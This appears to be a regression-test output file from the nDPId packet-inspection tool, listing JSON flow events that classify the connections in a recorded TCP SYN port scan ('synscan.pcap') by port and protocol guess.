+00592{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057478,"flow_last_seen":1278275057478,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":111,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
+00577{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057478,"flow_last_seen":1278275057478,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":111,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1865,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061211,"flow_last_seen":1278275061211,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2160,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1865,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061211,"flow_last_seen":1278275061211,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2160,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":465,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059096,"flow_last_seen":1278275059096,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2161,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":465,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059096,"flow_last_seen":1278275059096,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2161,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00592{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1278275056340,"flow_last_seen":1278275056401,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":113,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
+00576{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1278275056340,"flow_last_seen":1278275056401,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":113,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":483,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059220,"flow_last_seen":1278275059220,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2161,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":483,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059220,"flow_last_seen":1278275059220,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2161,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1593,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060847,"flow_last_seen":1278275060847,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":119,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1593,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060847,"flow_last_seen":1278275060847,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":119,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1657,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060949,"flow_last_seen":1278275060949,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":119,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
+00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1657,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060949,"flow_last_seen":1278275060949,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":119,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1034,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060071,"flow_last_seen":1278275060071,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2170,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1034,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060071,"flow_last_seen":1278275060071,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2170,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1121,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060182,"flow_last_seen":1278275060182,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2170,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1121,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060182,"flow_last_seen":1278275060182,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2170,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00593{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":523,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1278275059345,"flow_last_seen":1278275059407,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36061,"dst_port":113,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
+00577{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":523,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1278275059345,"flow_last_seen":1278275059407,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36061,"dst_port":113,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00593{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":723,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059626,"flow_last_seen":1278275059626,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":125,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00578{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":723,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059626,"flow_last_seen":1278275059626,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":125,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00593{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":782,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059735,"flow_last_seen":1278275059735,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":125,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00578{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":782,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059735,"flow_last_seen":1278275059735,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":125,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":425,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058971,"flow_last_seen":1278275058971,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":4224,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
+00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":425,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058971,"flow_last_seen":1278275058971,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":4224,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":441,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059095,"flow_last_seen":1278275059095,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":4224,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":441,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059095,"flow_last_seen":1278275059095,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":4224,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1286,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060438,"flow_last_seen":1278275060438,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2179,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1286,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060438,"flow_last_seen":1278275060438,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2179,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1364,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060541,"flow_last_seen":1278275060541,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2179,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
+00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1364,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060541,"flow_last_seen":1278275060541,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2179,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00639{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":39,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057678,"flow_last_seen":1278275057678,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":135,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"RPC","breed":"Acceptable","category":"RPC"}} +00577{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":39,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057678,"flow_last_seen":1278275057678,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":135,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00639{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":61,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057820,"flow_last_seen":1278275057820,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":135,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"RPC","breed":"Acceptable","category":"RPC"}} +00577{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":61,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057820,"flow_last_seen":1278275057820,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":135,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00646{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275056403,"flow_last_seen":1278275056403,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":139,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"NetBIOS","breed":"Acceptable","category":"System"}} 
+00577{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275056403,"flow_last_seen":1278275056403,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":139,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00646{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057477,"flow_last_seen":1278275057477,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":139,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"NetBIOS","breed":"Acceptable","category":"System"}} +00577{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057477,"flow_last_seen":1278275057477,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":139,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00763{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1788,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061108,"flow_last_seen":1278275061108,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":8333,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"1":"Match by port"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1788,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061108,"flow_last_seen":1278275061108,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":8333,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00763{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1869,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061211,"flow_last_seen":1278275061211,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":8333,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": 
{"total":750,"client":575,"server":175}}},"confidence": {"1":"Match by port"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1869,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061211,"flow_last_seen":1278275061211,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":8333,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":193,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058281,"flow_last_seen":1278275058281,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2190,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":193,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058281,"flow_last_seen":1278275058281,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2190,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
